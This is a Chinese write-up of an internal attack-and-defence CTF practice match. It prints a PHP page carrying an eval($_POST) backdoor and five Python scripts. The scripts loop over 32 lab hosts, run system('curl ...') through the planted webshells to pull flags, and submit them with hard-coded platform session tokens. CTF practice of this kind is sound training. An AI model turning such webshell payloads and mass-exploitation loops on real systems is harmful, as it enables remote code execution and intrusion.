background

没啥含金量,一次内部的练习赛,是个人赛,记录下来是觉得这个平台很有意思。2个半小时,一人运维6台机器,都是web机器,tql
上来就直接打,压根没有fix阶段,我全程都在写attack脚本,所以压根没管fix,感觉师傅们都有点摆烂,所以还是我侥幸拿了第一

详情

6台机器,有一台ssh上不去,应该是平台的问题。4台机子都是直接内置eval后门,d盾扫一下就出来了,还有一台也是内置后门,只不过做了点手段

//action.php
<?php
// Backdoored page dispatcher as found on the gamebox (see the writeup text).
require_once("library/common.php");
require_once("library/view.php");
// filter() is defined in library/common.php and is not visible here, so
// whether it strips "../" or NUL bytes from $_POST['page'] cannot be judged
// from this file; the require_once() below is only as confined as filter()
// makes it.
$page = filter($_POST['page']).'.php';
// Built from every POST field but never read anywhere in this file.
$post_data = array();
foreach ($_POST as $key => $value) {
$post_data[$key] = $value;
}

// The guard only requires that some existing page name be supplied; it does
// nothing to restrict the eval() that follows.
if (file_exists($page))
{
// BACKDOOR: raw POST input is evaluated as PHP. The leading @ suppresses
// error reporting for the call, which is what keeps a broken payload out of
// the error log. There is no legitimate reason to eval() request data; the
// fix is to delete this line. Static webshell scanners flag
// eval($_POST[...]) directly, which is the D盾 hit the writeup mentions.
@eval($_POST['pages']);
@require_once($page);
}
?>

用法也简单

action.php?page=action&pages=phpinfo();

只不过这个平台好有意思,需要使用gamebox去curl请求平台,然后平台返回一个flag,将这个flag提交即可得分
也就是说flag压根不在gamebox上,想要拿到flag简单的路径穿越这个压根不行,必须要rce获取到gamebox权限才能拿到flag
于是乎搓脚本就完事了

web1

import requests
import re
import time

# Round loop for the web1 target. Indentation has been reconstructed from an
# unindented paste: the block nesting, in particular where time.sleep(60)
# sits, is an assumption — confirm against the original before relying on it.
# Each sweep walks hosts 4.2.1.1 … 4.2.32.1, posts the command payload to the
# planted backdoor file, pulls a flag{...} out of the reply and submits it to
# the scoring platform at 192.18.1.253.
while True:
    for i in range(1,33):
        url="http://4.2.{}.1/application/admin/template/webshell.php".format(i)
        # Browser-looking headers; nothing in this script shows that the
        # backdoor requires any of them.
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        # Command run on the gamebox; curl -k skips certificate validation when
        # the box fetches its flag from the platform.
        data="key=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            flag=resp.text
            pattern = r'flag\{(.+?)\}'
            match_obj = re.search(pattern, flag)
            if match_obj:
                flag_content = match_obj.group(1)
                flag='flag{'+flag_content+'}'
                print(flag)
            else:
                # NOTE: on a miss, flag still holds the whole response body and
                # is submitted below unchanged.
                print('未找到 flag{} 标记')

            url="https://192.18.1.253/api/comp/question/saveAttack"
            # Platform credentials are hard-coded: the token header and the
            # PHPSESSID/token cookie presumably identify the player's account
            # and should not be committed or shared as-is.
            headers={
                "Host": "192.18.1.253",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
                "Accept": "application/json, text/plain, */*",
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Origin": "https://192.18.1.253",
                "Connection": "close",
                "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            # The form body is assembled by string formatting and sent verbatim;
            # flag is not URL-encoded, so a value containing '&' or '=' would
            # split the form fields.
            data="comp_id=5&uanswer={}&id=29&question_id=10364".format(flag)

            # verify=False: the platform's TLS certificate is not checked.
            resp=requests.post(url,headers=headers,data=data,verify=False)
            # unicode_escape turns \uXXXX sequences in the reply into readable
            # text; NOTE(review): applied to raw UTF-8 bytes it can mangle
            # non-ASCII characters — confirm the platform returns ASCII-escaped
            # JSON.
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            # Only the 1 s timeout is handled; any other requests exception
            # (e.g. a refused connection) propagates and ends the script.
            print("超时")
    # Assumed to sit at while-body level: pause between full sweeps.
    time.sleep(60)

web2

import requests
import re
import time

# Round loop for the web2 target (the action.php backdoor shown above).
# Indentation has been reconstructed from an unindented paste: the block
# nesting, in particular where time.sleep(60) sits, is an assumption —
# confirm against the original before relying on it.
# Each sweep walks hosts 4.2.1.2 … 4.2.32.2, posts the payload, pulls a
# flag{...} out of the reply and submits it to the platform at 192.18.1.253.
while True:
    for i in range(1,33):
        url="http://4.2.{}.2/action.php".format(i)
        # Browser-looking headers; nothing in this script shows that the
        # backdoor requires any of them.
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        # page= satisfies action.php's file_exists() guard; pages= is what its
        # eval() executes. curl -k skips certificate validation on the box.
        data="page=action&pages=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            flag=resp.text
            pattern = r'flag\{(.+?)\}'
            match_obj = re.search(pattern, flag)
            if match_obj:
                flag_content = match_obj.group(1)
                flag='flag{'+flag_content+'}'
                print(flag)
            else:
                # NOTE: on a miss, flag still holds the whole response body and
                # is submitted below unchanged.
                print('未找到 flag{} 标记')

            url="https://192.18.1.253/api/comp/question/saveAttack"
            # Platform credentials are hard-coded: the token header and the
            # PHPSESSID/token cookie presumably identify the player's account
            # and should not be committed or shared as-is.
            headers={
                "Host": "192.18.1.253",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
                "Accept": "application/json, text/plain, */*",
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Origin": "https://192.18.1.253",
                "Connection": "close",
                "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            # The form body is assembled by string formatting and sent verbatim;
            # flag is not URL-encoded, so a value containing '&' or '=' would
            # split the form fields.
            data="comp_id=5&uanswer={}&id=30&question_id=10361".format(flag)

            # verify=False: the platform's TLS certificate is not checked.
            resp=requests.post(url,headers=headers,data=data,verify=False)
            # unicode_escape turns \uXXXX sequences in the reply into readable
            # text; NOTE(review): applied to raw UTF-8 bytes it can mangle
            # non-ASCII characters — confirm the platform returns ASCII-escaped
            # JSON.
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            # Only the 1 s timeout is handled; any other requests exception
            # (e.g. a refused connection) propagates and ends the script.
            print("超时")
    # Assumed to sit at while-body level: pause between full sweeps.
    time.sleep(60)

web4

import requests
import time
# Round loop for the web4 target. Indentation has been reconstructed from an
# unindented paste: the block nesting, in particular where time.sleep(60)
# sits, is an assumption — confirm against the original before relying on it.
# Unlike the web1/web2/web5 scripts there is no flag{...} extraction here:
# the whole response body is printed and submitted as the answer.
while True:
    for i in range(1,33):
        # The command travels in the b= query parameter of a GET request;
        # the space in it is left for requests to percent-encode.
        url="http://4.2.{}.4/templates/system/index.php?b=curl -k https://192.18.1.253/Getkey/index/index".format(i)
        # Browser-looking headers; Content-Type is set even though a GET
        # without a body is sent.
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        try:
            resp=requests.get(url=url,headers=headers,timeout=1)
            # NOTE: flag is the raw response body, whatever it contains; an
            # error page from the target is submitted just the same.
            flag=resp.text
            print(flag)
            url="https://192.18.1.253/api/comp/question/saveAttack"
            # Platform credentials are hard-coded: the token header and the
            # PHPSESSID/token cookie presumably identify the player's account
            # and should not be committed or shared as-is.
            headers={
                "Host": "192.18.1.253",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
                "Accept": "application/json, text/plain, */*",
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Origin": "https://192.18.1.253",
                "Connection": "close",
                "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            # The form body is assembled by string formatting and sent verbatim;
            # the unencoded response body goes straight into uanswer, so any
            # '&' or '=' in it splits the form fields.
            data="comp_id=5&uanswer={}&id=33&question_id=10358".format(flag)

            # verify=False: the platform's TLS certificate is not checked.
            resp=requests.post(url,headers=headers,data=data,verify=False)
            # unicode_escape turns \uXXXX sequences in the reply into readable
            # text; NOTE(review): applied to raw UTF-8 bytes it can mangle
            # non-ASCII characters — confirm the platform returns ASCII-escaped
            # JSON.
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            # Only the 1 s timeout is handled; any other requests exception
            # (e.g. a refused connection) propagates and ends the script.
            print("超时")
    # Assumed to sit at while-body level: pause between full sweeps.
    time.sleep(60)

web5

import requests
import re
import time

# Round loop for the web5 target (the .phtml file under images/). Indentation
# has been reconstructed from an unindented paste: the block nesting, in
# particular where time.sleep(60) sits, is an assumption — confirm against the
# original before relying on it.
# Each sweep walks hosts 4.2.1.5 … 4.2.32.5, posts the payload, pulls a
# flag{...} out of the reply and submits it to the platform at 192.18.1.253.
while True:
    for i in range(1,33):
        # The host part varies with i, but the query string still carries a
        # fixed 4.2.7.5 copy of the same path — presumably a leftover from
        # manual testing; whether the target reads it is not visible here.
        url="http://4.2.{}.5/images/93277ac25e12820af94c499ba23e769f.phtml?http:%2f%2f4.2.7.5%2fimages%2f93277ac25e12820af94c499ba23e769f.phtml".format(i)
        # Browser-looking headers; nothing in this script shows that the
        # backdoor requires any of them.
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        # Command run on the gamebox; curl -k skips certificate validation when
        # the box fetches its flag from the platform.
        data="c=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            flag=resp.text
            pattern = r'flag\{(.+?)\}'
            match_obj = re.search(pattern, flag)
            if match_obj:
                flag_content = match_obj.group(1)
                flag='flag{'+flag_content+'}'
                print(flag)
            else:
                # NOTE: on a miss, flag still holds the whole response body and
                # is submitted below unchanged.
                print('未找到 flag{} 标记')

            url="https://192.18.1.253/api/comp/question/saveAttack"
            # Platform credentials are hard-coded: the token header and the
            # PHPSESSID/token cookie presumably identify the player's account
            # and should not be committed or shared as-is.
            headers={
                "Host": "192.18.1.253",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
                "Accept": "application/json, text/plain, */*",
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Origin": "https://192.18.1.253",
                "Connection": "close",
                "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            # The form body is assembled by string formatting and sent verbatim;
            # flag is not URL-encoded, so a value containing '&' or '=' would
            # split the form fields.
            data="comp_id=5&uanswer={}&id=32&question_id=10366".format(flag)

            # verify=False: the platform's TLS certificate is not checked.
            resp=requests.post(url,headers=headers,data=data,verify=False)
            # unicode_escape turns \uXXXX sequences in the reply into readable
            # text; NOTE(review): applied to raw UTF-8 bytes it can mangle
            # non-ASCII characters — confirm the platform returns ASCII-escaped
            # JSON.
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            # Only the 1 s timeout is handled; any other requests exception
            # (e.g. a refused connection) propagates and ends the script.
            print("超时")
    # Assumed to sit at while-body level: pause between full sweeps.
    time.sleep(60)

web6

import requests
import time

# Round loop for the web6 target. Indentation has been reconstructed from an
# unindented paste: the block nesting, in particular where time.sleep(60)
# sits, is an assumption — confirm against the original before relying on it.
# As in the web4 script there is no flag{...} extraction: the whole response
# body is submitted as the answer, and it is not printed first.
while True:
    for i in range(1,33):
        url="http://4.2.{}.6/app/webroot/config.php".format(i)
        # Browser-looking headers; nothing in this script shows that the
        # backdoor requires any of them.
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Upgrade-Insecure-Requests": "1"
        }
        # Command run on the gamebox; curl -k skips certificate validation when
        # the box fetches its flag from the platform.
        data="shell=system('curl -k https://192.18.1.253/Getkey/index/index');"
        try:
            resp=requests.post(url=url,data=data,headers=headers,timeout=1)
            # NOTE: flag is the raw response body, whatever it contains; an
            # error page from the target is submitted just the same.
            flag=resp.text
            url="https://192.18.1.253/api/comp/question/saveAttack"
            # Platform credentials are hard-coded: the token header and the
            # PHPSESSID/token cookie presumably identify the player's account
            # and should not be committed or shared as-is.
            headers={
                "Host": "192.18.1.253",
                "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0",
                "Accept": "application/json, text/plain, */*",
                "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "application/x-www-form-urlencoded",
                "token": "iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Origin": "https://192.18.1.253",
                "Connection": "close",
                "Referer": "https://192.18.1.253/",
                "Cookie": "think_language=zh-CN; PHPSESSID=7cobrm88u0p4pn2duo37snoss1; token=iTE9yCTZVgBOK_PL5380I_nN4H95cMzEP7MDQFNsdWTwlvoYmoe9OoKYnMrWfTFv",
                "Sec-Fetch-Dest": "empty",
                "Sec-Fetch-Mode": "cors",
                "Sec-Fetch-Site": "same-origin"
            }
            # The form body is assembled by string formatting and sent verbatim;
            # the unencoded response body goes straight into uanswer, so any
            # '&' or '=' in it splits the form fields.
            data="comp_id=5&uanswer={}&id=34&question_id=10363".format(flag)

            # verify=False: the platform's TLS certificate is not checked.
            resp=requests.post(url,headers=headers,data=data,verify=False)
            # unicode_escape turns \uXXXX sequences in the reply into readable
            # text; NOTE(review): applied to raw UTF-8 bytes it can mangle
            # non-ASCII characters — confirm the platform returns ASCII-escaped
            # JSON.
            print(resp.content.decode('unicode_escape'))
        except requests.exceptions.Timeout:
            # Only the 1 s timeout is handled; any other requests exception
            # (e.g. a refused connection) propagates and ends the script.
            print("超时")
    # Assumed to sit at while-body level: pause between full sweeps.
    time.sleep(60)